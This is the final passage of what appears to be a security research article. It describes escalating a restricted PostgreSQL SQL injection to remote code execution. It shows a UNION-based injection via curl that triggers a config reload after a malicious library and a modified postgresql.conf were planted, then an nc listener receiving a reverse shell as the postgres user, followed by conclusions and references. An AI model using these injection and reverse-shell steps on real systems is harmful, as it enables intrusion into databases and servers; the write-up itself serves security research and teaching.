=== attacker server ===
$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
# postgresql.conf
=== target server ===
ubuntu@ubuntu-virtual-machine:~$ md5sum /etc/postgresql/13/main/postgresql.conf
480bb646f178be2a9a2b609b384e20de /etc/postgresql/13/main/postgresql.conf
=== attacker server ===
$ md5sum postgresql_new.conf
480bb646f178be2a9a2b609b384e20de postgresql_new.conf
---[ 4.4 - Reload successful We are all set. Now for the moment of glory! A quick config reload and we get a reverse shell back from the server.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
On the attacker host:
$ nc -lvnp 8888
Listening on 0.0.0.0 8888
Connection received on 172.23.16.1 53004
id
uid=129(postgres) gid=138(postgres) groups=138(postgres),115(ssl-cert)
pwd
/var/lib/postgresql
--[ 5 - Conclusions In this article, we managed to escalate the impact of a seemingly very restricted SQL injection to a critical level by recreating DELETE and UPDATE statements from scratch via the direct modification of the DBMS files and data, and develop a novel technique of escalating user permissions! Excessive server file read/write permissions can be a powerful tool in the wrong hands. There is still much to discover with this attack vector, but I hope you've learned something useful today. Cheers, adeadfed --[ 6 - References
[0] https://github.com/gin-gonic/gin
[1] https://github.com/jackc/pgx
[2] https://github.com/jackc/pgx/issues/1090
[3] backend/tcop/postgres.c#L1468
[4] https://www.postgresql.org/docs/current/lo-funcs.html
[5] https://pulsesecurity.co.nz/articles/postgres-sqli
[6] postgres-sql-injection-to-rce-with-archive-command
[7] https://www.postgresql.org/docs/9.4/functions-admin.html
[8] https://www.postgresql.org/docs/current/storage-hot.html
[9] https://www.postgresql.org/docs/current/storage-page-layout.html
[10] https://github.com/adeadfed/postgresql-filenode-editor
[11] https://postgresqlco.nf/doc/en/param/session_preload_libraries/
[12] https://www.manniwood.com/2020_12_21/read_pg_from_go.html
--[ 7 - Source code
|=[ EOF ]=---------------------------------------------------------------=|